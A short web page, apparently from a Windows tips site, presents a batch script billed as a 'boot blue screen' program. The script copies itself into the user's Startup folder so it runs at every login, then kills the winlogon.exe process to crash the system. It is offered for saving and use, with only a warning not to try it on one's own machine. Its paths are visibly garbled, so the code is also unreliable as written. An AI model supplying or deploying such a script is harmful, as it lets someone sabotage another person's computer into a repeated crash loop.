Win10 boot blue screen batch small program

  
  

This is a boot blue screen small program

@echo off

set var=%userprofile%\\\\"Start" menu\\Programs\\Start

xcopy/y %0 "%var%"\\\\

cmd /c start /min ntsd -cq -pn winlogon.exe 1>nul 2>nul

and then save For the .bat format, you can pay attention: don't take your own computer
to do the experiment yourself at your own risk

Copyright © Windows knowledge All Rights Reserved